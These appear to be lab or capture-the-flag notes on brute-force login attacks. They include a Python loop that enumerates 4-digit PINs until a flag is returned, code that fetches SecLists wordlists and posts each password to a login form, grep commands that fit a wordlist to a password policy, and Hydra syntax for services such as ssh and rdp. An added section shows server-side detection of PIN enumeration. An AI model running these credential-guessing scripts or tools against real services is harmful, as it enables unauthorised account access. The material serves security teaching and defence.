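Not a dictionary attack: brute-forcing a PIN passed as a GET request parameter.

```python
import requests

ip = ""    # target IP address
port = 12  # target port

# Try every 4-digit PIN, 0000 through 9999
for pin in range(10000):
    formatted_pin = f"{pin:04d}"  # zero-pad to 4 digits
    print(f"Attempted Pin: {formatted_pin}")
    response = requests.get(f"http://{ip}:{port}/pin?pin={formatted_pin}")
    # A successful response carries a 'flag' key in its JSON body
    if response.ok and 'flag' in response.json():
        print(f"Correct pin found: {formatted_pin}")
        print(f"Flag: {response.json()['flag']}")
        break
```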
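What the loop above looks like from the server side, as an added detection example that is not part of the original notes: it flags any client that requests more than a threshold of distinct `pin` values within a sliding window. The Common Log Format layout, the threshold, the window and the 401 status on failed attempts are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Assumed log format: Common Log Format, restricted to GET /pin?pin=... requests.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"GET /pin\?pin=(?P<pin>\d+) HTTP/[\d.]+" \d{3}'
)

def detect_pin_enumeration(lines, max_distinct=5, window=timedelta(seconds=60)):
    """Map each client IP to the time it first exceeded max_distinct
    different PIN values inside one sliding window."""
    recent = defaultdict(deque)   # ip -> (timestamp, pin) pairs still in window
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue              # not a /pin request
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        seen = recent[m["ip"]]
        seen.append((ts, m["pin"]))
        while ts - seen[0][0] > window:
            seen.popleft()        # expire requests older than the window
        # Count distinct values so a user retrying the same PIN is not flagged.
        if len({pin for _, pin in seen}) > max_distinct:
            alerts.setdefault(m["ip"], ts)
    return alerts

def sample_log():
    """Constructed log lines (documentation IP ranges), not real traffic."""
    t0 = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    def row(ip, offset, pin, status):
        stamp = (t0 + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{stamp}] "GET /pin?pin={pin} HTTP/1.1" {status} 23'
    # One client walks the PIN space in order, one request per second.
    rows = [row("203.0.113.7", i, f"{i:04d}", 401) for i in range(10)]
    # Another client mistypes once, retries, then succeeds.
    rows += [row("198.51.100.4", 0, "1243", 401),
             row("198.51.100.4", 20, "1243", 401),
             row("198.51.100.4", 40, "1234", 200)]
    return rows

if __name__ == "__main__":
    for ip, when in detect_pin_enumeration(sample_log()).items():
        print(f"{ip} exceeded the distinct-PIN threshold at {when.isoformat()}")
```

The same counter can back a server-side lockout or rate limit, since 10,000 candidates is a small enough space that only attempt limiting protects a 4-digit PIN.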
You can download a dictionary directly and use it:

```python
passwords = requests.get("https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/500-worst-passwords.txt").text.splitlines()
for password in passwords:
    # Check each response the same way as in the PIN loop above
    response = requests.post(f"http://{ip}:{port}/dictionary", data={'password': password})
```
Filter the wordlist according to the password policy:

```shell
wget https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/darkweb2017_top-10000.txt
# Minimum length of 8 characters
grep -E '^.{8,}$' darkweb2017_top-10000.txt > darkweb2017-minlength.txt
# At least one uppercase letter
grep -E '[A-Z]' darkweb2017-minlength.txt > darkweb2017-uppercase.txt
# At least one lowercase letter
grep -E '[a-z]' darkweb2017-uppercase.txt > darkweb2017-lowercase.txt
# At least one digit
grep -E '[0-9]' darkweb2017-lowercase.txt > darkweb2017-number.txt
```
Install Hydra:

```shell
sudo apt-get -y install hydra
```

Basic syntax:

```shell
hydra [login_options] [password_options] [attack_options] [service_options]
```

-f stops after the first valid login.
-s sets the port.
-t sets the number of parallel tasks.
The target is given as service://server_ip/hostname.
-m passes module options, e.g. "POST:user=^USER^&pass=^PASS^"
-M target-ips.txt runs against multiple IPs.

Services: ftp, ssh, http-get, http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect", smtp, pop3, imap, mysql, mssql, vnc, rdp